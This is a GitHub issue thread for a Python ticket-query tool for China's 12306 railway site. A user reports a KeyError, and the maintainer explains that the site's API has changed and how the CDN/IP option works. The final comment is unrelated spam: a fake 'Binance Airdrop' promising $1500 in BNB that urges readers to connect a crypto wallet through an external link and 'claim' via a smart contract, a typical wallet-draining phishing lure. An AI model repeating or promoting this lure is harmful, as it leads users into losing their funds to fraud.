### ISSUE TITLE
怎样填CDN参数

### ISSUE THREAD

**Issue by wiwengweng** [WangYihang/12306#1]
$ python 12306.py 明天 上海 北京 kyfw.12306.cn
正在获取官网的火车站信息文件版本...
获取成功 !
官网版本号 : [  ]
正在获取本地缓存文件文件名...
获取成功 ! 本地文件名 : [ _station_names.dat ]
正在解析本地文件版本号...
本地版本号 : [  ]
官网火车站文件更新 , 正在下载...
正在读取文件...
正在解析站点信息...
解析成功 ! 总站点数 : [ 31836 ]
正在读取文件...
正在解析站点信息...
解析成功 ! 总站点数 : [ 31836 ]
查询中...
`====================================`
Traceback (most recent call last):
  File "12306.py", line 314, in <module>
    main()
  File "12306.py", line 52, in main
    train_no = queryResult.getTrainNo(i)
  File "/Users/yunlongwen/Documents/12306/querier.py", line 103, in getTrainNo
    return self.trainsJson[index]["queryLeftNewDTO"]["train_no"]
KeyError: 0

**Comment by WangYihang** [comment]
不好意思啊 , 这个仓库很久没有更新了 , 我刚才测试了一下发现 12306 的接口已经改变 , 所以暂时不能使用了 , 如果你有兴趣的话可以研究一下 12306 的后台接口 :1st_place_medal:

**Comment by WangYihang** [comment]
CDN 参数是为了查询到更多的票 , 可以直接使用域名 : kyfw.12306.cn 也可以使用 ip , 因为 12306 网站在全国各地都有分站 , 分站的 ip 不同 , 因为各个分站之间数据同步不是很及时 , 所以通过水平 dns 查询就可以找到还有票的网站

**Comment by O-king** [comment]
@WangYihang cdn的ip是怎么访问接口的，我把域名替换成ip 总是得不到数据

**Comment by WangYihang** [comment]
@old-king 不好意思啊，这个项目已经很久以前的了，差不多有两年没有维护了，所以 12306 的接口也有变化，再去适配比较麻烦，如果感兴趣的话可以抓包看一下 12306 的查票购票过程、或者阅读本仓库或者类似仓库的代码。

**Comment by WangYihang** [comment]
@old-king 目前的实现是直接向指定 IP 发送 HTTP 请求，然后将 Host 字段设置为应该的域名即可。

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
